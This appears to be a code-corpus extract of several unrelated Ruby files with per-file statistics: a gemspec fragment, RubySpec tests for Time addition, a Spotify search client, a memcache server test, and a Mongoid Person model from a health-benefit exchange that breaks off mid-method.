s.files = ["lib/arvados.rb", "lib/arvados/google_api_client.rb",
"lib/arvados/collection.rb", "lib/arvados/keep.rb",
"README", "LICENSE-2.0.txt"]
s.required_ruby_version = '>= 1.8.7'
s.add_dependency('activesupport', '>= 3')
s.add_dependency('andand', '~> 1.3', '>= 1.3.3')
# Our google-api-client dependency used to be < 0.9, but that could be
# satisfied by the buggy 0.9.pre*. https://dev.arvados.org/issues/9213
s.add_dependency('arvados-google-api-client', '>= 0.7', '< 0.8.9')
# work around undeclared dependency on i18n in some activesupport 3.x.x:
s.add_dependency('i18n', '~> 0')
s.add_dependency('json', '>= 1.7.7', '<3')
# arvados-google-api-client 0.8.7.2 is incompatible with faraday 0.16.2
s.add_dependency('faraday', '< 0.16')
s.add_runtime_dependency('jwt', '<2', '>= 0.1.5')
s.homepage =
'https://arvados.org'
end
| 39.962963 | 137 | 0.648749 |
624c2a489330af8bf8c55bff32db818db99e0d2d | 3,323 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/methods', __FILE__)
describe "Time#+" do
it "increments the time by the specified amount" do
(Time.at(0) + 100).should == Time.at(100)
end
it "is a commutative operator" do
(Time.at(1.1) + 0.9).should == Time.at(0.9) + 1.1
end
ruby_version_is "" ... "1.9" do
it "rounds micro seconds rather than truncates" do
# The use of 8.9999999 is intentional. This is because
# Time treats the fractional part as the number of micro seconds.
# Thusly it multiplies the result by 1_000_000 to go from
# seconds to microseconds. That conversion should be rounded
# properly. In this case, it's rounded up to 1,000,000, and thus
# contributes a full extra second to the Time object.
t = Time.at(0) + 8.9999999
t.should == Time.at(9)
t.usec.should == 0
# Check the non-edge case works properly, that the fractional part
# contributes to #usecs
t2 = Time.at(0) + 8.9
t2.usec.should == 900000
end
it "adds a negative Float" do
t = Time.at(100) + -1.3
t.usec.should == 700000
t.to_i.should == 98
end
end
ruby_version_is "1.9" do
it "does NOT round" do
t = Time.at(0) + Rational(8_999_999_999_999_999, 1_000_000_000_000_000)
t.should_not == Time.at(9)
t.usec.should == 999_999
t.nsec.should == 999_999_999
t.subsec.should == Rational(999_999_999_999_999, 1_000_000_000_000_000)
end
it "adds a negative Float" do
t = Time.at(100) + -1.3
t.usec.should == 699999
t.to_i.should == 98
end
end
ruby_version_is "" ... "1.9" do
it "increments the time by the specified amount as float numbers" do
(Time.at(1.1) + 0.9).should == Time.at(2)
end
it "accepts arguments that can be coerced into Float" do
(obj = mock('10.5')).should_receive(:to_f).and_return(10.5)
(Time.at(100) + obj).should == Time.at(110.5)
end
it "raises TypeError on argument that can't be coerced into Float" do
lambda { Time.now + Object.new }.should raise_error(TypeError)
lambda { Time.now + "stuff" }.should raise_error(TypeError)
end
end
ruby_version_is "1.9" do
it "increments the time by the specified amount as rational numbers" do
(Time.at(Rational(11, 10)) + Rational(9, 10)).should == Time.at(2)
end
it "accepts arguments that can be coerced into Rational" do
(obj = mock('10')).should_receive(:to_r).and_return(Rational(10))
(Time.at(100) + obj).should == Time.at(110)
end
it "raises TypeError on argument that can't be coerced into Rational" do
lambda { Time.now + Object.new }.should raise_error(TypeError)
lambda { Time.now + "stuff" }.should raise_error(TypeError)
end
#see [ruby-dev:38446]
it "tracks microseconds" do
time = Time.at(0)
time += Rational(123456, 1000000)
time.usec.should == 123456
time += Rational(654321, 1000000)
time.usec.should == 777777
end
end
it "raises TypeError on Time argument" do
lambda { Time.now + Time.now }.should raise_error(TypeError)
end
it "raises TypeError on nil argument" do
lambda { Time.now + nil }.should raise_error(TypeError)
end
end
| 32.262136 | 77 | 0.643395 |
2856cc9a7e5f29530022d61d95ee7deeeaa4ab80 | 540 | require 'spotify_client'
class SpotifyClient
RESULT_SIZE = 5
def initialize
@client = Spotify::Client.new
end
def search_track(search_string)
results_for(search_string).map do |result|
{
id: result.fetch('id'),
artist: result.fetch('artists').first['name'],
track: result.fetch('name')
}
end
end
private
def results_for(search_string)
@client.search(:track, search_string)
.fetch('tracks')
.fetch('items')
.first(RESULT_SIZE)
end
end
| 18.62069 | 54 | 0.616667 |
33c1be954ffb35b5a5c084b45c2eb69d2a78c7aa | 794 | require File.dirname(__FILE__) + '/memcache_server_test_helper'
class MemcacheNativeServerTest < Test::Unit::TestCase
include MemcacheServerTestHelper
include MemcacheServerTestHelper::AdvancedMethods
with_prefixes nil, "foo:", "bar:"
PORTS = [11212, 11213, 11214, 11215, 11216]
def setup
init_memcache(*PORTS) do
Memcache::NativeServer.new(:servers => PORTS.collect {|p| "localhost:#{p}"})
end
end
def test_server_down
m = Memcache::NativeServer.new(:servers => ["localhost:9998"])
assert_equal nil, m.get('foo')
e = assert_raise(Memcache::Error) do
m.set('foo', 'foo')
end
assert_match 'SERVER HAS FAILED', e.message
end
def test_close
m.close
m.set('foo', 'foo')
assert_equal 'foo', m.get('foo')[:value]
end
end
| 24.060606 | 82 | 0.680101 |
e29276270eb7cf98635a0b93464599d2cfbea7e9 | 33,847 | class Person
include Config::AcaModelConcern
include Config::SiteModelConcern
include Mongoid::Document
include SetCurrentUser
include Mongoid::Timestamps
include Mongoid::Versioning
include Mongoid::Attributes::Dynamic
include SponsoredBenefits::Concerns::Ssn
include SponsoredBenefits::Concerns::Dob
include Notify
include UnsetableSparseFields
include FullStrippedNames
include ::BenefitSponsors::Concerns::Observable
# verification history tracking
include Mongoid::History::Trackable
track_history :on => [:first_name,
:middle_name,
:last_name,
:full_name,
:alternate_name,
:encrypted_ssn,
:dob,
:gender,
:is_incarcerated,
:is_disabled,
:ethnicity,
:race,
:tribal_id,
:no_dc_address,
:no_dc_address_reason,
:is_active,
:no_ssn],
:modifier_field => :modifier,
:version_field => :tracking_version,
:track_create => true, # track document creation, default is false
:track_update => true, # track document updates, default is true
:track_destroy => true # track document destruction, default is false
extend Mongorder
# validates_with Validations::DateRangeValidator
GENDER_KINDS = %W(male female)
IDENTIFYING_INFO_ATTRIBUTES = %w(first_name last_name ssn dob)
ADDRESS_CHANGE_ATTRIBUTES = %w(addresses phones emails)
RELATIONSHIP_CHANGE_ATTRIBUTES = %w(person_relationships)
PERSON_CREATED_EVENT_NAME = "acapi.info.events.individual.created"
PERSON_UPDATED_EVENT_NAME = "acapi.info.events.individual.updated"
VERIFICATION_TYPES = ['Social Security Number', 'American Indian Status', 'Citizenship', 'Immigration status']
field :hbx_id, type: String
field :name_pfx, type: String
field :first_name, type: String
field :middle_name, type: String
field :last_name, type: String
field :name_sfx, type: String
field :full_name, type: String
field :alternate_name, type: String
field :encrypted_ssn, type: String
field :gender, type: String
field :dob, type: Date
# Sub-model in-common attributes
field :date_of_death, type: Date
field :dob_check, type: Boolean
field :is_incarcerated, type: Boolean
field :is_disabled, type: Boolean
field :ethnicity, type: Array
field :race, type: String
field :tribal_id, type: String
field :is_tobacco_user, type: String, default: "unknown"
field :language_code, type: String
field :no_dc_address, type: Boolean, default: false
field :no_dc_address_reason, type: String, default: ""
field :is_active, type: Boolean, default: true
field :updated_by, type: String
field :no_ssn, type: String #ConsumerRole TODO TODOJF
field :is_physically_disabled, type: Boolean
delegate :is_applying_coverage, to: :consumer_role, allow_nil: true
# Login account
belongs_to :user
belongs_to :employer_contact,
class_name: "EmployerProfile",
inverse_of: :employer_contacts,
index: true
belongs_to :broker_agency_contact,
class_name: "BrokerAgencyProfile",
inverse_of: :broker_agency_contacts,
index: true
belongs_to :general_agency_contact,
class_name: "GeneralAgencyProfile",
inverse_of: :general_agency_contacts,
index: true
embeds_one :consumer_role, cascade_callbacks: true, validate: true
embeds_one :resident_role, cascade_callbacks: true, validate: true
embeds_one :broker_role, cascade_callbacks: true, validate: true
embeds_one :hbx_staff_role, cascade_callbacks: true, validate: true
#embeds_one :responsible_party, cascade_callbacks: true, validate: true # This model does not exist.
embeds_one :csr_role, cascade_callbacks: true, validate: true
embeds_one :assister_role, cascade_callbacks: true, validate: true
embeds_one :inbox, as: :recipient
embeds_many :employer_staff_roles, cascade_callbacks: true, validate: true
embeds_many :broker_agency_staff_roles, cascade_callbacks: true, validate: true
embeds_many :employee_roles, cascade_callbacks: true, validate: true
embeds_many :general_agency_staff_roles, cascade_callbacks: true, validate: true
embeds_many :person_relationships, cascade_callbacks: true, validate: true
embeds_many :addresses, cascade_callbacks: true, validate: true
embeds_many :phones, cascade_callbacks: true, validate: true
embeds_many :emails, cascade_callbacks: true, validate: true
embeds_many :documents, as: :documentable
accepts_nested_attributes_for :consumer_role, :resident_role, :broker_role, :hbx_staff_role,
:person_relationships, :employee_roles, :phones, :employer_staff_roles
accepts_nested_attributes_for :phones, :reject_if => Proc.new { |addy| addy[:full_phone_number].blank? }, allow_destroy: true
accepts_nested_attributes_for :addresses, :reject_if => Proc.new { |addy| addy[:address_1].blank? && addy[:city].blank? && addy[:state].blank? && addy[:zip].blank? }, allow_destroy: true
accepts_nested_attributes_for :emails, :reject_if => Proc.new { |addy| addy[:address].blank? }, allow_destroy: true
validates_presence_of :first_name, :last_name
validate :date_functional_validations
validate :no_changing_my_user, :on => :update
validates :encrypted_ssn, uniqueness: true, allow_blank: true
validates :gender,
allow_blank: true,
inclusion: { in: Person::GENDER_KINDS, message: "%{value} is not a valid gender" }
before_save :generate_hbx_id
before_save :update_full_name
before_save :strip_empty_fields
#after_save :generate_family_search
after_create :create_inbox
add_observer ::BenefitSponsors::Observers::EmployerStaffRoleObserver.new, :contact_changed?
index({hbx_id: 1}, {sparse:true, unique: true})
index({user_id: 1}, {sparse:true, unique: true})
index({last_name: 1})
index({first_name: 1})
index({last_name: 1, first_name: 1})
index({first_name: 1, last_name: 1})
index({first_name: 1, last_name: 1, hbx_id: 1, encrypted_ssn: 1}, {name: "person_searching_index"})
index({encrypted_ssn: 1}, {sparse: true, unique: true})
index({dob: 1}, {sparse: true})
index({dob: 1, encrypted_ssn: 1})
index({last_name: 1, dob: 1}, {sparse: true})
# Broker child model indexes
index({"broker_role._id" => 1})
index({"broker_role.provider_kind" => 1})
index({"broker_role.broker_agency_id" => 1})
index({"broker_role.npn" => 1}, {sparse: true, unique: true})
# Employer role index
index({"employer_staff_roles._id" => 1})
index({"employer_staff_roles.employer_profile_id" => 1})
# Consumer child model indexes
index({"consumer_role._id" => 1})
index({"consumer_role.aasm_state" => 1})
index({"consumer_role.is_active" => 1})
# Employee child model indexes
index({"employee_roles._id" => 1})
index({"employee_roles.employer_profile_id" => 1})
index({"employee_roles.census_employee_id" => 1})
index({"employee_roles.benefit_group_id" => 1})
index({"employee_roles.is_active" => 1})
# HbxStaff child model indexes
index({"hbx_staff_role._id" => 1})
index({"hbx_staff_role.is_active" => 1})
# PersonRelationship child model indexes
index({"person_relationship.relative_id" => 1})
index({"hbx_employer_staff_role._id" => 1})
#index({"hbx_responsible_party_role._id" => 1})
index({"hbx_csr_role._id" => 1})
index({"hbx_assister._id" => 1})
scope :all_consumer_roles, -> { exists(consumer_role: true) }
scope :all_resident_roles, -> { exists(resident_role: true) }
scope :all_employee_roles, -> { exists(employee_roles: true) }
scope :all_employer_staff_roles, -> { exists(employer_staff_roles: true) }
#scope :all_responsible_party_roles, -> { exists(responsible_party_role: true) }
scope :all_broker_roles, -> { exists(broker_role: true) }
scope :all_hbx_staff_roles, -> { exists(hbx_staff_role: true) }
scope :all_csr_roles, -> { exists(csr_role: true) }
scope :all_assister_roles, -> { exists(assister_role: true) }
scope :by_hbx_id, ->(person_hbx_id) { where(hbx_id: person_hbx_id) }
scope :by_broker_role_npn, ->(br_npn) { where("broker_role.npn" => br_npn) }
scope :active, ->{ where(is_active: true) }
scope :inactive, ->{ where(is_active: false) }
#scope :broker_role_having_agency, -> { where("broker_role.broker_agency_profile_id" => { "$ne" => nil }) }
scope :broker_role_having_agency, -> { where("broker_role.benefit_sponsors_broker_agency_profile_id" => { "$ne" => nil }) }
scope :broker_role_applicant, -> { where("broker_role.aasm_state" => { "$eq" => :applicant })}
scope :broker_role_pending, -> { where("broker_role.aasm_state" => { "$eq" => :broker_agency_pending })}
scope :broker_role_certified, -> { where("broker_role.aasm_state" => { "$in" => [:active]})}
scope :broker_role_decertified, -> { where("broker_role.aasm_state" => { "$eq" => :decertified })}
scope :broker_role_denied, -> { where("broker_role.aasm_state" => { "$eq" => :denied })}
scope :by_ssn, ->(ssn) { where(encrypted_ssn: Person.encrypt_ssn(ssn)) }
scope :unverified_persons, -> { where(:'consumer_role.aasm_state' => { "$ne" => "fully_verified" })}
scope :matchable, ->(ssn, dob, last_name) { where(encrypted_ssn: Person.encrypt_ssn(ssn), dob: dob, last_name: last_name) }
scope :general_agency_staff_applicant, -> { where("general_agency_staff_roles.aasm_state" => { "$eq" => :applicant })}
scope :general_agency_staff_certified, -> { where("general_agency_staff_roles.aasm_state" => { "$eq" => :active })}
scope :general_agency_staff_decertified, -> { where("general_agency_staff_roles.aasm_state" => { "$eq" => :decertified })}
scope :general_agency_staff_denied, -> { where("general_agency_staff_roles.aasm_state" => { "$eq" => :denied })}
# ViewFunctions::Person.install_queries
validate :consumer_fields_validations
after_create :notify_created
after_update :notify_updated
def active_general_agency_staff_roles
general_agency_staff_roles.select(&:active?)
end
def contact_addresses
existing_addresses = addresses.to_a
home_address = existing_addresses.detect { |addy| addy.kind == "home" }
return existing_addresses if home_address
add_employee_home_address(existing_addresses)
end
def add_employee_home_address(existing_addresses)
return existing_addresses unless employee_roles.any?
employee_contact_address = employee_roles.sort_by(&:hired_on).map(&:census_employee).compact.map(&:address).compact.first
return existing_addresses unless employee_contact_address
existing_addresses + [employee_contact_address]
end
def contact_phones
phones.reject { |ph| ph.full_phone_number.blank? }
end
delegate :citizen_status, :citizen_status=, :to => :consumer_role, :allow_nil => true
delegate :ivl_coverage_selected, :to => :consumer_role, :allow_nil => true
delegate :all_types_verified?, :to => :consumer_role
def notify_created
notify(PERSON_CREATED_EVENT_NAME, {:individual_id => self.hbx_id } )
end
def notify_updated
notify(PERSON_UPDATED_EVENT_NAME, {:individual_id => self.hbx_id } )
end
def is_aqhp?
family = self.primary_family if self.primary_family
if family
check_households(family) && check_tax_households(family)
else
false
end
end
def check_households family
family.households.present? ? true : false
end
def check_tax_households family
family.households.first.tax_households.present? ? true : false
end
def completed_identity_verification?
return false unless user
user.identity_verified?
end
#after_save :update_family_search_collection
# before_save :notify_change
# def notify_change
# notify_change_event(self, {"identifying_info"=>IDENTIFYING_INFO_ATTRIBUTES, "address_change"=>ADDRESS_CHANGE_ATTRIBUTES, "relation_change"=>RELATIONSHIP_CHANGE_ATTRIBUTES})
# end
def update_family_search_collection
# ViewFunctions::Person.run_after_save_search_update(self.id)
end
def generate_hbx_id
write_attribute(:hbx_id, HbxIdGenerator.generate_member_id) if hbx_id.blank?
end
def strip_empty_fields
if encrypted_ssn.blank?
unset_sparse("encrypted_ssn")
end
if user_id.blank?
unset_sparse("user_id")
end
end
def date_of_birth=(val)
self.dob = Date.strptime(val, "%m/%d/%Y").to_date rescue nil
end
def gender=(new_gender)
write_attribute(:gender, new_gender.to_s.downcase)
end
# Get the {Family} where this {Person} is the primary family member
#
# family itegrity ensures only one active family can be the primary for a person
#
# @return [ Family ] the family member who matches this person
def primary_family
@primary_family ||= Family.find_primary_applicant_by_person(self).first
end
def families
Family.find_all_by_person(self)
end
def full_name
@full_name = [name_pfx, first_name, middle_name, last_name, name_sfx].compact.join(" ")
end
def first_name_last_name_and_suffix
[first_name, last_name, name_sfx].compact.join(" ")
case name_sfx
when "ii" ||"iii" || "iv" || "v"
[first_name.capitalize, last_name.capitalize, name_sfx.upcase].compact.join(" ")
else
[first_name.capitalize, last_name.capitalize, name_sfx].compact.join(" ")
end
end
def is_active?
is_active
end
def update_ssn_and_gender_for_employer_role(census_employee)
return if census_employee.blank?
update_attributes(ssn: census_employee.ssn) if ssn.blank?
update_attributes(gender: census_employee.gender) if gender.blank?
end
# collect all verification types user can have based on information he provided
def verification_types
verification_types = []
verification_types << 'DC Residency'
verification_types << 'Social Security Number' if ssn
verification_types << 'American Indian Status' if !(tribal_id.nil? || tribal_id.empty?)
if self.us_citizen
verification_types << 'Citizenship'
else
verification_types << 'Immigration status'
end
verification_types
end
def relatives
person_relationships.reject do |p_rel|
p_rel.relative_id.to_s == self.id.to_s
end.map(&:relative)
end
def find_relationship_with(other_person)
if self.id == other_person.id
"self"
else
person_relationship_for(other_person).try(:kind)
end
end
def person_relationship_for(other_person)
person_relationships.detect do |person_relationship|
person_relationship.relative_id == other_person.id
end
end
def ensure_relationship_with(person, relationship)
return if person.blank?
existing_relationship = self.person_relationships.detect do |rel|
rel.relative_id.to_s == person.id.to_s
end
if existing_relationship
existing_relationship.assign_attributes(:kind => relationship)
update_census_dependent_relationship(existing_relationship)
existing_relationship.save!
else
self.person_relationships << PersonRelationship.new({
:kind => relationship,
:relative_id => person.id
})
end
end
def add_work_email(email)
existing_email = self.emails.detect do |e|
(e.kind == 'work') &&
(e.address.downcase == email.downcase)
end
return nil if existing_email.present?
self.emails << ::Email.new(:kind => 'work', :address => email)
end
def home_address
addresses.detect { |adr| adr.kind == "home" }
end
def mailing_address
addresses.detect { |adr| adr.kind == "mailing" } || home_address
end
def has_mailing_address?
addresses.any? { |adr| adr.kind == "mailing" }
end
def home_email
emails.detect { |adr| adr.kind == "home" }
end
def work_email
emails.detect { |adr| adr.kind == "work" }
end
def work_or_home_email
work_email || home_email
end
def work_email_or_best
email = emails.detect { |adr| adr.kind == "work" } || emails.first
(email && email.address) || (user && user.email)
end
def work_phone
phones.detect { |phone| phone.kind == "work" } || main_phone
end
def main_phone
phones.detect { |phone| phone.kind == "main" }
end
def home_phone
phones.detect { |phone| phone.kind == "home" }
end
def mobile_phone
phones.detect { |phone| phone.kind == "mobile" }
end
def work_phone_or_best
best_phone = work_phone || mobile_phone || home_phone
best_phone ? best_phone.full_phone_number : nil
end
def has_active_consumer_role?
consumer_role.present? and consumer_role.is_active?
end
def has_active_resident_role?
resident_role.present? and resident_role.is_active?
end
def can_report_shop_qle?
employee_roles.first.census_employee.qle_30_day_eligible?
end
def has_active_employee_role?
active_employee_roles.any?
end
def has_active_shopping_role?
has_active_employee_role? ||
has_active_resident_role? ||
has_active_consumer_role?
end
def has_employer_benefits?
active_employee_roles.present? #&& active_employee_roles.any?{|r| r.benefit_group.present?}
end
def active_employee_roles
employee_roles.select{|employee_role| employee_role.census_employee && employee_role.census_employee.is_active? }
end
def has_multiple_active_employers?
active_employee_roles.count > 1
end
def has_active_employer_staff_role?
employer_staff_roles.present? and employer_staff_roles.active.present?
end
def active_employer_staff_roles
employer_staff_roles.present? ? employer_staff_roles.active : []
end
def has_multiple_roles?
consumer_role.present? && active_employee_roles.present?
end
def has_active_employee_role_for_census_employee?(census_employee)
if census_employee
(active_employee_roles.detect { |employee_role| employee_role.census_employee == census_employee }).present?
end
end
def residency_eligible?
no_dc_address and no_dc_address_reason.present?
end
def is_dc_resident?
return false if no_dc_address == true && no_dc_address_reason.blank?
return true if no_dc_address == true && no_dc_address_reason.present?
address_to_use = addresses.collect(&:kind).include?('home') ? 'home' : 'mailing'
addresses.each{|address| return true if address.kind == address_to_use && address.state == aca_state_abbreviation}
return false
end
class << self
def default_search_order
[[:last_name, 1],[:first_name, 1]]
end
def search_hash(s_str)
clean_str = s_str.strip
s_rex = ::Regexp.new(::Regexp.escape(clean_str), true)
{
"$or" => ([
{"first_name" => s_rex},
{"last_name" => s_rex},
{"hbx_id" => s_rex},
{"encrypted_ssn" => encrypt_ssn(s_rex)}
] + additional_exprs(clean_str))
}
end
def additional_exprs(clean_str)
additional_exprs = []
if clean_str.include?(" ")
parts = clean_str.split(" ").compact
first_re = ::Regexp.new(::Regexp.escape(parts.first), true)
last_re = ::Regexp.new(::Regexp.escape(parts.last), true)
additional_exprs << {:first_name => first_re, :last_name => last_re}
end
additional_exprs
end
def search_first_name_last_name_npn(s_str, query=self)
clean_str = s_str.strip
s_rex = ::Regexp.new(::Regexp.escape(s_str.strip), true)
query.where({
"$or" => ([
{"first_name" => s_rex},
{"last_name" => s_rex},
{"broker_role.npn" => s_rex}
] + additional_exprs(clean_str))
})
end
# Find all employee_roles. Since person has_many employee_roles, person may show up
# employee_role.person may not be unique in returned set
def employee_roles
people = exists(:'employee_roles.0' => true).entries
people.flat_map(&:employee_roles)
end
def find_all_brokers_or_staff_members_by_agency(broker_agency)
Person.or({:"broker_role.broker_agency_profile_id" => broker_agency.id},
{:"broker_agency_staff_roles.broker_agency_profile_id" => broker_agency.id})
end
def sans_primary_broker(broker_agency)
where(:"broker_role._id".nin => [broker_agency.primary_broker_role_id])
end
def find_all_staff_roles_by_employer_profile(employer_profile)
#where({"$and"=>[{"employer_staff_roles.employer_profile_id"=> employer_profile.id}, {"employer_staff_roles.is_owner"=>true}]})
staff_for_employer(employer_profile)
end
def match_existing_person(personish)
return nil if personish.ssn.blank?
Person.where(:encrypted_ssn => encrypt_ssn(personish.ssn), :dob => personish.dob).first
end
def person_has_an_active_enrollment?(person)
if !person.primary_family.blank? && !person.primary_family.enrollments.blank?
person.primary_family.enrollments.each do |enrollment|
return true if enrollment.is_active
end
end
return false
end
def dob_change_implication_on_active_enrollments(person, new_dob)
# This method checks if there is a premium implication in all active enrollments when a persons DOB is changed.
# Returns a hash with Key => HbxEnrollment ID and, Value => true if enrollment has Premium Implication.
premium_impication_for_enrollment = Hash.new
active_enrolled_hbxs = person.primary_family.active_household.hbx_enrollments.active.enrolled_and_renewal
# Iterate over each enrollment and check if there is a Premium Implication based on the following rule:
# Rule: There are Implications when DOB changes makes anyone in the household a different age on the day coverage started UNLESS the
# change is all within the 0-20 age range or all within the 61+ age range (20 >= age <= 61)
active_enrolled_hbxs.each do |hbx|
new_temp_person = person.dup
new_temp_person.dob = Date.strptime(new_dob.to_s, '%m/%d/%Y')
new_age = new_temp_person.age_on(hbx.effective_on) # age with the new DOB on the day coverage started
current_age = person.age_on(hbx.effective_on) # age with the current DOB on the day coverage started
next if new_age == current_age # No Change in age -> No Premium Implication
# No Implication when the change is all within the 0-20 age range or all within the 61+ age range
if ( current_age.between?(0,20) && new_age.between?(0,20) ) || ( current_age >= 61 && new_age >= 61 )
#premium_impication_for_enrollment[hbx.id] = false
else
premium_impication_for_enrollment[hbx.id] = true
end
end
premium_impication_for_enrollment
end
# Return an instance list of active People who match identifying information criteria
def match_by_id_info(options)
ssn_query = options[:ssn]
dob_query = options[:dob]
last_name = options[:last_name]
first_name = options[:first_name]
raise ArgumentError, "must provide an ssn or first_name/last_name/dob or both" if (ssn_query.blank? && (dob_query.blank? || last_name.blank? || first_name.blank?))
matches = Array.new
matches.concat Person.active.where(encrypted_ssn: encrypt_ssn(ssn_query), dob: dob_query).to_a unless ssn_query.blank?
#matches.concat Person.where(last_name: last_name, dob: dob_query).active.to_a unless (dob_query.blank? || last_name.blank?)
if first_name.present? && last_name.present? && dob_query.present?
first_exp = /^#{first_name}$/i
last_exp = /^#{last_name}$/i
matches.concat Person.active.where(dob: dob_query, last_name: last_exp, first_name: first_exp).to_a.select{|person| person.ssn.blank? || ssn_query.blank?}
end
matches.uniq
end
def brokers_or_agency_staff_with_status(query, status)
query.and(
Person.or(
{ :"broker_agency_staff_roles.aasm_state" => status },
{ :"broker_role.aasm_state" => status }
).selector
)
end
def staff_for_employer(employer_profile)
if employer_profile.is_a? (EmployerProfile)
self.where(:employer_staff_roles => {
'$elemMatch' => {
employer_profile_id: employer_profile.id,
aasm_state: :is_active}
}).to_a
else
self.where(:employer_staff_roles => {
'$elemMatch' => {
benefit_sponsor_employer_profile_id: employer_profile.id,
aasm_state: :is_active}
}).to_a
end
end
def staff_for_employer_including_pending(employer_profile)
if employer_profile.is_a? (EmployerProfile)
self.where(:employer_staff_roles => {
'$elemMatch' => {
employer_profile_id: employer_profile.id,
:aasm_state.ne => :is_closed
}
})
else
self.where(:employer_staff_roles => {
'$elemMatch' => {
benefit_sponsor_employer_profile_id: employer_profile.id,
:aasm_state.ne => :is_closed
}
})
end
end
# Adds employer staff role to person
# Returns status and message if failed
# Returns status and person if successful
def add_employer_staff_role(first_name, last_name, dob, email, employer_profile)
person = Person.where(first_name: /^#{first_name}$/i, last_name: /^#{last_name}$/i, dob: dob)
return false, 'Person count too high, please contact HBX Admin' if person.count > 1
return false, 'Person does not exist on the HBX Exchange' if person.count == 0
if employer_profile.is_a? (EmployerProfile)
employer_staff_role = EmployerStaffRole.create(person: person.first, employer_profile_id: employer_profile._id)
else
employer_staff_role = EmployerStaffRole.create(person: person.first, benefit_sponsor_employer_profile_id: employer_profile._id)
end
employer_staff_role.save
return true, person.first
end
# Sets employer staff role to inactive
# Returns false if person not found
# Returns false if employer staff role not matches
# Returns true is role was marked inactive
def deactivate_employer_staff_role(person_id, employer_profile_id)
begin
person = Person.find(person_id)
rescue
return false, 'Person not found'
end
if role = person.employer_staff_roles.detect{|role| (role.benefit_sponsor_employer_profile_id.to_s == employer_profile_id.to_s || role.employer_profile_id.to_s == employer_profile_id.to_s) && !role.is_closed?}
role.update_attributes!(:aasm_state => :is_closed)
return true, 'Employee Staff Role is inactive'
else
return false, 'No matching employer staff role'
end
end
end
# HACK
# FIXME
# TODO: Move this out of here
attr_writer :us_citizen, :naturalized_citizen, :indian_tribe_member, :eligible_immigration_status
attr_accessor :is_consumer_role
attr_accessor :is_resident_role
before_save :assign_citizen_status_from_consumer_role
def assign_citizen_status_from_consumer_role
if is_consumer_role.to_s=="true"
assign_citizen_status
end
end
def us_citizen=(val)
@us_citizen = (val.to_s == "true")
@naturalized_citizen = false if val.to_s == "false"
end
def naturalized_citizen=(val)
@naturalized_citizen = (val.to_s == "true")
end
def indian_tribe_member=(val)
self.tribal_id = nil if val.to_s == false
@indian_tribe_member = (val.to_s == "true")
end
def eligible_immigration_status=(val)
@eligible_immigration_status = (val.to_s == "true")
end
def us_citizen
return @us_citizen if !@us_citizen.nil?
return nil if citizen_status.blank?
@us_citizen ||= ::ConsumerRole::US_CITIZEN_STATUS_KINDS.include?(citizen_status)
end
def naturalized_citizen
return @naturalized_citizen if !@naturalized_citizen.nil?
return nil if citizen_status.blank?
@naturalized_citizen ||= (::ConsumerRole::NATURALIZED_CITIZEN_STATUS == citizen_status)
end
def indian_tribe_member
return @indian_tribe_member if !@indian_tribe_member.nil?
return nil if citizen_status.blank?
@indian_tribe_member ||= !(tribal_id.nil? || tribal_id.empty?)
end
def eligible_immigration_status
return @eligible_immigration_status if !@eligible_immigration_status.nil?
return nil if us_citizen.nil?
return nil if @us_citizen
return nil if citizen_status.blank?
@eligible_immigration_status ||= (::ConsumerRole::ALIEN_LAWFULLY_PRESENT_STATUS == citizen_status)
end
def assign_citizen_status
new_status = nil
if naturalized_citizen
new_status = ::ConsumerRole::NATURALIZED_CITIZEN_STATUS
elsif us_citizen
new_status = ::ConsumerRole::US_CITIZEN_STATUS
elsif eligible_immigration_status
new_status = ::ConsumerRole::ALIEN_LAWFULLY_PRESENT_STATUS
elsif (!eligible_immigration_status.nil?)
new_status = ::ConsumerRole::NOT_LAWFULLY_PRESENT_STATUS
elsif
self.errors.add(:base, "Citizenship status can't be nil.")
end
self.consumer_role.lawful_presence_determination.assign_citizen_status(new_status) if new_status
end
def agent?
agent = self.csr_role || self.assister_role || self.broker_role || self.hbx_staff_role || self.general_agency_staff_roles.present?
!!agent
end
def contact_info(email_address, area_code, number, extension)
if email_address.present?
email = emails.detect{|mail|mail.kind == 'work'}
if email
email.update_attributes!(address: email_address)
else
email= Email.new(kind: 'work', address: email_address)
emails.append(email)
self.update_attributes!(emails: emails)
save!
end
end
phone = phones.detect{|p|p.kind == 'work'}
if phone
phone.update_attributes!(area_code: area_code, number: number, extension: extension)
else
phone = Phone.new(kind: 'work', area_code: area_code, number: number, extension: extension)
phones.append(phone)
self.update_attributes!(phones: phones)
save!
end
end
def generate_family_search
::MapReduce::FamilySearchForPerson.populate_for(self)
end
def set_ridp_for_paper_application(session_var)
if user && session_var == 'paper'
user.ridp_by_paper_application
end
end
private
def update_census_dependent_relationship(existing_relationship)
return unless existing_relationship.valid?
Operations::CensusMembers::Update.new.call(relationship: existing_relationship, action: 'update_relationship')
end
def create_inbox
welcome_subject = "Welcome to #{site_short_name}"
welcome_body = "#{site_short_name} is the #{aca_state_name}'s on-line marketplace to shop, compare, and select health insurance that meets your health needs and budgets."
mailbox = Inbox.create(recipient: self)
mailbox.messages.create(subject: welcome_subject, body: welcome_body, from: "#{site_short_name}")
end
def update_full_name
full_name
end
def no_changing_my_user
if self.persisted? && self.user_id_changed?
old_user, new_user= self.user_id_change
return if old_user.blank?
if (old_user != new_user)
errors.add(:base, "you may not change the user_id of a person once it has been set and saved")
end
end
end
# Verify basic date rules
def date_functional_validations
date_of_death_is_blank_or_past
date_of_death_follows_date_of_birth
end
def date_of_death_is_blank_or_past
return unless self.date_of_death.present?
errors.add(:date_of_death, "future date: #{self.date_of_death} is invalid date of death") if TimeKeeper.date_of_record < self.date_of_death
end
def date_of_death_follows_date_of_birth
return unless self.date_of_death.present? && self.dob.present?
if self.date_of_death < self.dob
errors.add(:date_of_death, "date of death cannot preceed date of birth")
errors.add(:dob, "date of birth cannot follow date of death")
end
end
def consumer_fields_validations
if @is_consumer_role.to_s == "true" #&& consumer_role.is_applying_coverage.to_s == "true" #only check this for consumer flow.
citizenship_validation
native_american_validation
incarceration_validation
end
end
def native_american_validation
self.errors.add(:base, "American Indian / Alaskan Native status is required.") if indian_tribe_member.to_s.blank?
if !tribal_id.present? && @us_citizen == true && @indian_tribe_member == true
self.errors.add(:base, "Tribal id is required when native american / alaskan native is selected")
elsif tribal_id.present? && !tribal_id.match("[0-9]{9}")
self.errors.add(:base, "Tribal id must be 9 digits")
end
end
def citizenship_validation
if @us_citizen.to_s.blank?
self.errors.add(:base, "Citizenship status is required.")
elsif @us_citizen == false && @eligible_immigration_status.nil?
